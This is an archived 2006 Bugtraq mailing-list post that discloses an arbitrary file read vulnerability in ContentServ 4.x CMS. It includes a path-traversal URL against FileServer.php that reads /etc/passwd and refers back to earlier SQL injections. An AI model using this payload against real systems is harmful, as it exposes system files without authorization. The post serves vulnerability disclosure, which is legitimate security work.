bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

contentserv 4.x

from [capt . nem0] [Permanent Link][Original]
To: full-disclosure-bounces@lists.grok.org.uk
Subject: contentserv 4.x
From: capt.nem0@gmx.de
Date: Thu, 30 Nov 2006 18:12:28 +0100
Cc: bugtraq@securityfocus.com
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
ContentServ again (still) features remote reading of arbitrary files
====================================================================


ContentServ is a cms and "cross media publishing" software.

Let me quote from their website:

"At ContentServ, there is always something happening. We continously enhance 
our products and services.[...]"

Ok.

Now for the real fun remember:
http://archives.neohapsis.com/archives/fulldisclosure/2005-09/0650.html


Still with me? Ok. Lets forget the sql injections for a moment, what if we try: 
http://somesite/contentserv/4.2/admin/FileServer.php?src=../../../../../etc/passwd

Ooops!


have fun!


ps.: alex...when will you EVER learn?!



-- 
Der GMX SmartSurfer hilft bis zu 70% Ihrer Onlinekosten zu sparen! 
Ideal für Modem und ISDN: http://www.gmx.net/de/go/smartsurfer
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • contentserv 4.x, capt . nem0 <=
Previous by Date:  safely concatenating strings in portable C (Re: GnuPG 1.4 and 2.0 buffer overflow), Solar Designer
Next by Date:  LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability, ajannhwt
Previous by Thread:  Invision Community Blog Mod 1.2.4 .PHP SQL Injection Vulnerability, infection
Next by Thread:  LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability, ajannhwt
Indexes:  [Date] [Thread] [Top] [All Lists]